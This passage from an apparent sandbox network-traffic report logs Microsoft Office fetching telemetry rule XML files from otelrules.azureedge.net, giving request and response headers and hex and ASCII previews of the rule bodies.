                                                                                                                                                                                            2024-11-20 20:05:54 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            131192.168.2.44992913.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:54 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:54 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:54 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1366
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                            ETag: "0x8DC582BE5B7B174"
                                                                                                                                                                                            x-ms-request-id: b82dd3a8-b01e-0053-0e8c-3acdf8000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200554Z-185f5d8b95cgrrn8hC1NYCgwh40000000ak000000000pzzd
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:54 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            132192.168.2.44992613.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:54 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:55 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:54 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1399
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                                                                                                                                            ETag: "0x8DC582BE1CC18CD"
                                                                                                                                                                                            x-ms-request-id: 21476416-401e-00a3-1c88-3a8b09000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200554Z-178bfbc474bnwsh4hC1NYC2ubs00000000cg000000005utk
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:55 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            133192.168.2.44993013.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:56 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:56 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:56 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1399
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                                                                                                                                            ETag: "0x8DC582BE976026E"
                                                                                                                                                                                            x-ms-request-id: 85bacdce-f01e-003f-758c-3ad19d000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200556Z-r1d97b99577sdxndhC1TEBec5n00000009f000000000b4tf
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:56 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            134192.168.2.44993213.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:56 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:57 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:56 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1425
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                            ETag: "0x8DC582BE6BD89A1"
                                                                                                                                                                                            x-ms-request-id: 5a5a1706-c01e-0079-6c8c-3ae51a000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200556Z-1777c6cb754lv4cqhC1TEB13us0000000a2000000000c6r1
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:57 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            135192.168.2.44993113.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:56 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:57 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:57 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1362
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                            ETag: "0x8DC582BDC13EFEF"
                                                                                                                                                                                            x-ms-request-id: 40dbe65e-a01e-0050-4363-3bdb6e000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200557Z-178bfbc474bkvpdnhC1NYCuu2w00000000h000000000335g
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:57 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            136192.168.2.44993313.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:56 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:57 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:57 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1388
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                            ETag: "0x8DC582BDBD9126E"
                                                                                                                                                                                            x-ms-request-id: 073925de-a01e-0032-2d8c-3a1949000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200557Z-1777c6cb754gvvgfhC1TEBz4rg0000000a1000000000tu7k
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:57 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            137192.168.2.44993413.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:56 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:57 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:57 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1415
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                                                                                                                                                                            ETag: "0x8DC582BE7C66E85"
                                                                                                                                                                                            x-ms-request-id: d5dea27c-d01e-00ad-3c8c-3ae942000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200557Z-1777c6cb754rz2pghC1TEBghen00000009x000000000m6q9
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:57 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            138192.168.2.44993513.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:58 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:58 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:58 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1378
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                            ETag: "0x8DC582BDB813B3F"
                                                                                                                                                                                            x-ms-request-id: de9d050e-401e-0078-2067-3b4d34000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200558Z-178bfbc474bmqmgjhC1NYCy16c00000000m0000000005yq4
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:58 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            139192.168.2.44993613.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:58 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:59 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:59 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 1405
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                                                                                                                                                                            ETag: "0x8DC582BE89A8F82"
                                                                                                                                                                                            x-ms-request-id: 9bd4509d-401e-005b-16fa-3a9c0c000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200559Z-r1d97b99577hc74hhC1TEBvbns000000096g00000000aurn
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:59 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            140192.168.2.44993713.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
